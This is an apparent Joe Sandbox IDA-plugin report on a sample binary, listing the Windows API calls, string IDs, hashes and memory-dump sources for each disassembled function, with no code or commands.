                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                • Opcode ID: f7524fb62513657f84ee22988970a23f36322a45f576bb6af631eadc930dadfc
                                                                                                                • Instruction ID: 399cbd54e5de24be2c6ac11899d550c828adff5d92b416d8f1c46705c5e4e177
                                                                                                                • Opcode Fuzzy Hash: f7524fb62513657f84ee22988970a23f36322a45f576bb6af631eadc930dadfc
                                                                                                                • Instruction Fuzzy Hash: D3318D35A00209AFCB04EB6CD895EBEBBB8FF4A314F14416AF505D7291DB71DA42CB51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                  • Part of subcall function 0093AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0093AABC
                                                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00939014
                                                                                                                • GetDlgCtrlID.USER32 ref: 0093901F
                                                                                                                • GetParent.USER32 ref: 0093903B
                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0093903E
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00939047
                                                                                                                • GetParent.USER32(?), ref: 00939063
                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00939066
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1536045017-1403004172
                                                                                                                • Opcode ID: 519a703c491bc9900769dd8f660e3b2467a19aff8988f0bc81742a148a46192a
                                                                                                                • Instruction ID: 9796673eb2b831fe74582047fcb075b03a4dc3de9e3a50c61a718d30ebfe7cfb
                                                                                                                • Opcode Fuzzy Hash: 519a703c491bc9900769dd8f660e3b2467a19aff8988f0bc81742a148a46192a
                                                                                                                • Instruction Fuzzy Hash: 8521D370A04108BBDF04ABA5DC95EFEBB79EF8A310F100119F961972B1DBB55819DE21
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                  • Part of subcall function 0093AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0093AABC
                                                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009390FD
                                                                                                                • GetDlgCtrlID.USER32 ref: 00939108
                                                                                                                • GetParent.USER32 ref: 00939124
                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00939127
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00939130
                                                                                                                • GetParent.USER32(?), ref: 0093914C
                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0093914F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1536045017-1403004172
                                                                                                                • Opcode ID: 27006a23b6c81942b3b53f92c4c0bf39442ab9c6d29feb0c787b36eb5164352a
                                                                                                                • Instruction ID: 0c902501cb6d6216536df180271a75331c88f0c49c1a0b66c68b49a7df1f4cba
                                                                                                                • Opcode Fuzzy Hash: 27006a23b6c81942b3b53f92c4c0bf39442ab9c6d29feb0c787b36eb5164352a
                                                                                                                • Instruction Fuzzy Hash: 6B21D374A04108BBDF00ABA5DC85FFEBB79EF45300F000019F961972A2DBB54815DA21
                                                                                                                APIs
                                                                                                                • GetParent.USER32 ref: 0093916F
                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00939184
                                                                                                                • _wcscmp.LIBCMT ref: 00939196
                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00939211
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                • API String ID: 1704125052-3381328864
                                                                                                                • Opcode ID: 716049e53cf0f5bd2e730fc8e8c865721c73cfdcf426822132a142a59adfe81f
                                                                                                                • Instruction ID: 96f9fcbb5bfd24c24beeb8d4f6837f2a799817dcfc3359669b3137abe1ca65ee
                                                                                                                • Opcode Fuzzy Hash: 716049e53cf0f5bd2e730fc8e8c865721c73cfdcf426822132a142a59adfe81f
                                                                                                                • Instruction Fuzzy Hash: 4811253629C707BEFE112768EC0BFA7779CDB55728F200426F920A40E2FEE168516D94
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 009588D7
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00958904
                                                                                                                • CoUninitialize.OLE32 ref: 0095890E
                                                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00958A0E
                                                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00958B3B
                                                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00972C0C), ref: 00958B6F
                                                                                                                • CoGetObject.OLE32(?,00000000,00972C0C,?), ref: 00958B92
                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00958BA5
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00958C25
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00958C35
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2395222682-0
                                                                                                                • Opcode ID: fd55233f45f53b3b65306322d855ac515decc4cd663efae449ddef6bf51c03e3
                                                                                                                • Instruction ID: 704fbb7cf28c661a6a4a6b188f6d7a1b935d9026a6d825395946af59978be40b
                                                                                                                • Opcode Fuzzy Hash: fd55233f45f53b3b65306322d855ac515decc4cd663efae449ddef6bf51c03e3
                                                                                                                • Instruction Fuzzy Hash: 01C124B1208305AFD700DF69C88492BB7E9FF89349F00496DF98A9B251DB71ED09CB52
                                                                                                                APIs
                                                                                                                • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00947A6C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafeVartype
                                                                                                                • String ID:
                                                                                                                • API String ID: 1725837607-0
                                                                                                                • Opcode ID: 314a74af896e69851cfd0003c1a3dad7b3c23800f0835db7f1ca3c1c6147ef7b
                                                                                                                • Instruction ID: 980224a8f5b9dd1b294d876d2c229d23eebf35e5bd82349f1edcd765ca96b6ab
                                                                                                                • Opcode Fuzzy Hash: 314a74af896e69851cfd0003c1a3dad7b3c23800f0835db7f1ca3c1c6147ef7b
                                                                                                                • Instruction Fuzzy Hash: 1BB17B7190820E9FDB00DFE4D885FBEB7B9EF49321F204429E541AB291D774A941DBA1
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000008), ref: 008E2231
                                                                                                                • SetTextColor.GDI32(?,000000FF), ref: 008E223B
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 008E2250
                                                                                                                • GetStockObject.GDI32(00000005), ref: 008E2258
                                                                                                                • GetClientRect.USER32(?), ref: 0091BDBB
                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0091BDD2
                                                                                                                • GetWindowDC.USER32(?), ref: 0091BDDE
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0091BDED
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0091BDFF
                                                                                                                • GetSysColor.USER32(00000005), ref: 0091BE1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3430376129-0
                                                                                                                • Opcode ID: c270ba387ac4292f472fa9c58b6383a558ea40dadc53aaca366854a4e7e24fa8
                                                                                                                • Instruction ID: ceb92ef7f2656ba31d0b95160dc77f940e6505aa76b3857d3ddf755f5c75c254
                                                                                                                • Opcode Fuzzy Hash: c270ba387ac4292f472fa9c58b6383a558ea40dadc53aaca366854a4e7e24fa8
                                                                                                                • Instruction Fuzzy Hash: 3A216D32518248EFDB116F64EC18BE97B66FB05321F114269FA26950F1CBB10991FF11
                                                                                                                APIs
                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008EFAA6
                                                                                                                • OleUninitialize.OLE32(?,00000000), ref: 008EFB45
                                                                                                                • UnregisterHotKey.USER32(?), ref: 008EFC9C
                                                                                                                • DestroyWindow.USER32(?), ref: 009245D6
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0092463B
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00924668
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                • String ID: close all
                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                • Opcode ID: 9d6feee3f0d2915b7f43e3ec67aa2e32c47e869b3134c0d37bdc4ee6c193e68e
                                                                                                                • Instruction ID: 5b5e78cea3d1d0a5dd51e2beaccbfb58689d70cfed6ca6c0d63ece8cdbddae6f
                                                                                                                • Opcode Fuzzy Hash: 9d6feee3f0d2915b7f43e3ec67aa2e32c47e869b3134c0d37bdc4ee6c193e68e
                                                                                                                • Instruction Fuzzy Hash: 8DA17D30701226CFCB29EF15D594B69F764FF46714F2042ADE90AAB262DB30AD16CF91
                                                                                                                APIs
                                                                                                                • EnumChildWindows.USER32(?,0093A439), ref: 0093A377
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumWindows
                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                • API String ID: 3555792229-1603158881
                                                                                                                • Opcode ID: 6fa0c980684a1e0c48266a1fdd9298be0da546c553a5e70b835134173df46d0e
                                                                                                                • Instruction ID: f691b510d85bade502bbee632a595fa5b380b4f46a4063e163a084f4615e02ea
                                                                                                                • Opcode Fuzzy Hash: 6fa0c980684a1e0c48266a1fdd9298be0da546c553a5e70b835134173df46d0e
                                                                                                                • Instruction Fuzzy Hash: 0991B331604605EECF08DFA4C486BEEFBA8FF45300F548119E89AA7191DF316A99CF91
                                                                                                                APIs
                                                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 008E2EAE
                                                                                                                  • Part of subcall function 008E1DB3: GetClientRect.USER32(?,?), ref: 008E1DDC
                                                                                                                  • Part of subcall function 008E1DB3: GetWindowRect.USER32(?,?), ref: 008E1E1D
                                                                                                                  • Part of subcall function 008E1DB3: ScreenToClient.USER32(?,?), ref: 008E1E45
                                                                                                                • GetDC.USER32 ref: 0091CD32
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0091CD45
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0091CD53
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0091CD68
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0091CD70
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0091CDFB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                • String ID: U
                                                                                                                • API String ID: 4009187628-3372436214
                                                                                                                • Opcode ID: d0aeab06a2cc543dbdf3b36ae34e10b86bd45d7b98e35431aceb7cd8bcee804d
                                                                                                                • Instruction ID: 43fa2dab25eec96703c8151c6ab9567f21fa275cb493b6ad16c65f2b2430669d
                                                                                                                • Opcode Fuzzy Hash: d0aeab06a2cc543dbdf3b36ae34e10b86bd45d7b98e35431aceb7cd8bcee804d
                                                                                                                • Instruction Fuzzy Hash: F071E27560020DDFCF218F64D884AEA3BB9FF49324F14467AED559A2A6C7308C80DBA0
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00951A50
                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00951A7C
                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00951ABE
                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00951AD3
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00951AE0
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00951B10
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00951B57
                                                                                                                  • Part of subcall function 00952483: GetLastError.KERNEL32(?,?,00951817,00000000,00000000,00000001), ref: 00952498
                                                                                                                  • Part of subcall function 00952483: SetEvent.KERNEL32(?,?,00951817,00000000,00000000,00000001), ref: 009524AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2603140658-3916222277
                                                                                                                • Opcode ID: df44c18a191566d449a27e4ee4a93727da67be308899c4799bf758d50ea566e5
                                                                                                                • Instruction ID: 6c3b0cf8d1962c3353c59e6704c9708b03415bbe7114b08011a3d8be3d7cc27b
                                                                                                                • Opcode Fuzzy Hash: df44c18a191566d449a27e4ee4a93727da67be308899c4799bf758d50ea566e5
                                                                                                                • Instruction Fuzzy Hash: F6418EB1501218BFEB12CF51DC99FBB7BACEF08355F00412AFD059A151E7B49E489BA4
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0096F910), ref: 00958D28
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0096F910), ref: 00958D5C
                                                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00958ED6
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00958F00
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                • String ID:
                                                                                                                • API String ID: 560350794-0
                                                                                                                • Opcode ID: eb9895940294993d1b10c90892ab75ac3e1bc3f8932008d8a8591d44f647c8d0
                                                                                                                • Instruction ID: d55933d9b62929489ca75f11133dfb79c73a74e6112ea4a67169144c11b525ac
                                                                                                                • Opcode Fuzzy Hash: eb9895940294993d1b10c90892ab75ac3e1bc3f8932008d8a8591d44f647c8d0
                                                                                                                • Instruction Fuzzy Hash: 1EF13C71A00209EFDF14DFA5C888EAEB7B9FF49315F108458F905AB291DB71AE49CB50
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0095F6B5
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0095F848
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0095F86C
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0095F8AC
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0095F8CE
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0095FA4A
                                                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0095FA7C
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0095FAAB
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0095FB22
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4090791747-0
                                                                                                                • Opcode ID: 904882d972654dc3e57ea0b80dc3eddb836f536314999495a1f973892ae7db82
                                                                                                                • Instruction ID: 687e4d78ebc3fbc88f8ee2f1ae4950ed2afe42ce977db49d18d94dac52dabbdc
                                                                                                                • Opcode Fuzzy Hash: 904882d972654dc3e57ea0b80dc3eddb836f536314999495a1f973892ae7db82
                                                                                                                • Instruction Fuzzy Hash: B8E1E2316043409FC714EF25C8A1B6ABBE5FF89360F14886DF8899B2A2CB70DC45CB52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0094466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00943697,?), ref: 0094468B
                                                                                                                  • Part of subcall function 0094466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00943697,?), ref: 009446A4
                                                                                                                  • Part of subcall function 00944A31: GetFileAttributesW.KERNEL32(?,0094370B), ref: 00944A32
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00944D40
                                                                                                                • _wcscmp.LIBCMT ref: 00944D5A
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00944D75
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 793581249-0
                                                                                                                • Opcode ID: f99a11921e3058ce3c5a9aa1ff68011006ef486b8cdf4a5531e814a5bfaf7138
                                                                                                                • Instruction ID: b93156b79c209939bf3290e2e627688098d66edf85ca1881f311bbdc2a3036fb
                                                                                                                • Opcode Fuzzy Hash: f99a11921e3058ce3c5a9aa1ff68011006ef486b8cdf4a5531e814a5bfaf7138
                                                                                                                • Instruction Fuzzy Hash: A55163B25083859BC724DBA4D881EDFB3ECAF85354F40092EF289D3191EF34A588C756
                                                                                                                APIs
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009686FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect
                                                                                                                • String ID:
